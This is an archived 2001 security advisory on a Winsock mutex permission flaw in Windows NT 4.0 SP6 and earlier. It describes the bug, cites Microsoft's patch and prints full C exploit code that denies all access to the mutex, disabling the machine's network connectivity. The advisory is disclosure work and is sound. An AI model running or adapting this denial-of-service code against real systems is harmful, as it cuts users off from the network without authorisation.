Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1215
HistoryJan 29, 2001 - 12:00 a.m.

ntsecurity.nu advisory: Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below

2001-01-2900:00:00
vulners.com
6

– Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below –

Author:

Arne Vidstrom ([email protected]) - http://ntsecurity.nu

Severity:

Denial Of Service if the attacker is able to execute the exploit code under
any account on the system. Remote exploitation is not possible.

Details:

There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0, to
which the Everyone group has Full Control. Any user can change this to No
Access, and that disables all network connectivity through Winsock until the
system is rebooted.

Vendor Response:

Microsoft has released a patch and you can read more about it in their
Security Bulletin at
http://www.microsoft.com/technet/security/bulletin/ms01-003.asp.

Sample exploit code:

/*
/* mutation.c - (c) 2000, Arne Vidstrom, [email protected]
/* http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/

#include <windows.h>
#include <aclapi.h>

int main(void)
{
PSID pEveryoneSID;
SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
PACL pDacl;
DWORD sizeNeeded;

    AllocateAndInitializeSid&#40;&amp;iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0,

0, 0, 0, &pEveryoneSID);
sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
GetLengthSid(pEveryoneSID) - sizeof(DWORD);
pDacl = (PACL) malloc(sizeNeeded);
InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex",
SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
free(pDacl);
return 0;
}